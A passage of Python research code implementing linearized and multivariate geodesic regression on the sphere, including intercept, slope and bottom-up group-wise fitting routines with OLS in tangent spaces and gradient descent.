v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.sphere_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent_VG_slope.tVector[ d ] = 0
current_tangent_VG_intercept.tVector[ d ] = 0
for par in range( nParam ):
# Intercept
if VG[ par ] == 0:
for d in range( nManifoldDim ):
current_tangent_VG_intercept.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# Slope
elif VG[ par ] == 1:
for d in range( nManifoldDim ):
current_tangent_VG_slope.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
intercept_n = newBase.ExponentialMap( current_tangent_VG_intercept )
slope_n = newBase.ParallelTranslateAtoB( newBase, intercept_n, current_tangent_VG_slope )
estimate_n = intercept_n.ExponentialMap( slope_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print( energy )
print( "=========================" )
break
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
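# Minimal usage sketch for the multivariate sphere regression above (hypothetical names).
# X is a list of covariate rows with the continuous variable last, Y a list of
# manifolds.sphere points of matching length, and VG marks each covariate as
# intercept-group (0) or slope-group (1) when the energy is evaluated:
#   X = [ [ 0, 55.0 ], [ 1, 63.0 ], [ 0, 71.0 ] ]
#   VG = [ 0, 1 ]
#   base, tangent_arr = MultivariateLinearizedGeodesicRegression_Sphere( X, Y, VG,
#                                                                        verbose = False )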
def MultivariateLinearizedGeodesicRegression_Sphere_Additive( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# A continuous variable such as age should be the last entry of the independent variables
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( Y )
else:
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.sphere( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.sphere_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor poin t to intercept" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent.tVector[ d ] = 0
for par in range( nParam ):
for d in range( nManifoldDim ):
current_tangent.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( current_tangent )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print( energy )
print( "=========================" )
break
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
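# The additive variant differs from the VG version above only in how the fitted tangent
# vectors are recombined when the energy is evaluated: all covariate effects are summed
# into a single tangent vector and applied with one exponential map, rather than composing
# an intercept-group map followed by a parallel-translated slope-group map.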
def MultivariateLinearizedGeodesicRegression_Intercept_Sphere( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# The anchor point is chosen from the last entry of the covariates
# A continuous variable, such as a genetic disease score, should be the last entry of the covariates
# If the data have no continuous covariate, the last entry can be a categorical one
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.sphere( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.sphere_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
print( "X")
print( X )
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor point to intercept" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.sphere_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent_VG_slope.tVector[ d ] = 0
current_tangent_VG_intercept.tVector[ d ] = 0
tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
for par in range( nParam ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print( energy )
print( "=========================" )
break
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_Sphere( X, Y, beta0, p0_list, tVec_intercept_arr, cov_intercept_list, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0:
nManifoldDim = beta0.nDim
slope_tVec = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] = 0
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
beta_tVec_f_i = manifolds.sphere_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ i ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk ] += ( est_beta_tt.tVector[ kk ] * cov_intercept_list[ i ][ tt ] )
f_i = beta0.ExponentialMap( beta_tVec_f_i )
Y_i_at_f_i = p0_list[ i ].ParallelTranslateAtoB( p0_list[ i ], f_i, Y_i )
Y_i_tilde = f_i.ParallelTranslateAtoB( f_i, beta0, Y_i_at_f_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
Y_i = Y[ i ]
beta_tVec_f_i = manifolds.sphere_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ i ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk ] += ( est_beta_tt.tVector[ kk ] * cov_intercept_list[ i ][ tt ] )
f_i = beta0.ExponentialMap( beta_tVec_f_i )
slope_at_f_i = beta0.ParallelTranslateAtoB( beta0, f_i, slope_tVec )
slope_at_p_i = beta0.ParallelTranslateAtoB( f_i, p0_list[ i ], slope_at_f_i )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = [ 0, 0, 0 ]
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.sphere_tVec( nManifoldDim )
slope_neg_eps = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ d ] " )
print( dE[ d ] )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter - 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# The anchor point is chosen from the last entry of the covariates
# A continuous variable, such as a genetic disease score, should be the last entry of the covariates
# If the data have no continuous covariate, the last entry can be a categorical one
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
print( t_list )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
Y_j = Y[ j ]
# Parallel translate a group-wise tangent vector to population-level intercept
beta_tVec_f_i = manifolds.sphere_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ j ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk ] += ( est_beta_tt.tVector[ kk ] * cov_intercept_list[ j ][ tt ] )
f_j = beta0.ExponentialMap( beta_tVec_f_i )
Y_j_at_f_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], f_j, Y_j )
Y_j_tilde = f_j.ParallelTranslateAtoB( f_j, beta0, Y_j_at_f_j )
tVec_j = Y_j_tilde
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# Intercept point
v_t = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
# print( "Anchor point to intercept" )
# print( v_to_base_on_p_anchor.tVector )
# newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
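# In the general branch above, each subject-level tangent vector Y[ j ] (anchored at
# p0_list[ j ]) is parallel-translated to the population intercept beta0 via the group-wise
# point f_j before ordinary least squares is run on the translated coordinates; the OLS
# constant term v_t is appended last as the covariate-independent slope entry.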
def MultivariateLinearizedGeodesicRegression_Slope_DirectTransport_Sphere( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0:
nManifoldDim = beta0.nDim
slope_tVec = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] = 0
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = [ 0, 0, 0 ]
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.sphere_tVec( nManifoldDim )
slope_neg_eps = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ d ] " )
print( dE[ d ] )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter - 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# The anchor point is chosen based on the last entry of the covariates
# A continuous variable, such as a genetic disease score, should be the last entry of the covariates
# If the data do not have a continuous covariate, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
print( t_list )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
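# One OLS model per tangent-vector coordinate: w_d ~ const + X ( statsmodels adds the constant column )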
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t ( constant term of the per-coordinate OLS fits )
v_t = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
# print( "Anchor point to intercept" )
# print( v_to_base_on_p_anchor.tVector )
# newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
def MultivariateLinearizedGeodesicRegression_Sphere_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
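# Bottom-up scheme: (1) fit a single-subject linearized geodesic regression per group to get
# ( p0_g, v_g ); (2) regress the group intercepts p0_g against the intercept covariates;
# (3) regress the group slope tangent vectors v_g against the slope covariates around beta0.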
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression_Sphere( t_list_g, pt_list_g )
print( "v_g.tVector" )
print( v_g.tVector )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Sphere( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
print( len ( cov_slope_group_list ) )
print( len ( v_group_list ) )
print( "cov_slope_group_list" )
print( cov_slope_group_list )
print( "v_group_list" )
print( v_group_list[ 0 ].tVector )
print( v_group_list[ 1 ].tVector )
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Sphere( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, cov_intercept_group_list, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
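# Example call shape ( hypothetical data, for illustration only ):
#   t_list   : per-group lists of time points, e.g. [ [ 0.0, 1.0, 2.0 ], [ 0.5, 1.5 ] ]
#   pt_list  : matching per-group lists of sphere point objects from the manifolds module
#   cov_int  : one intercept-covariate vector per group, e.g. [ [ 1, 0.3 ], [ 0, 0.7 ] ]
#   cov_slp  : one slope-covariate vector per group ( may be [] )
# beta0, tVec_int_arr, tVec_slope_arr = MultivariateLinearizedGeodesicRegression_Sphere_BottomUp( t_list, pt_list, cov_int, cov_slp )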
def MultivariateLinearizedGeodesicRegression_Slope_Sphere_PoorSasaki( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
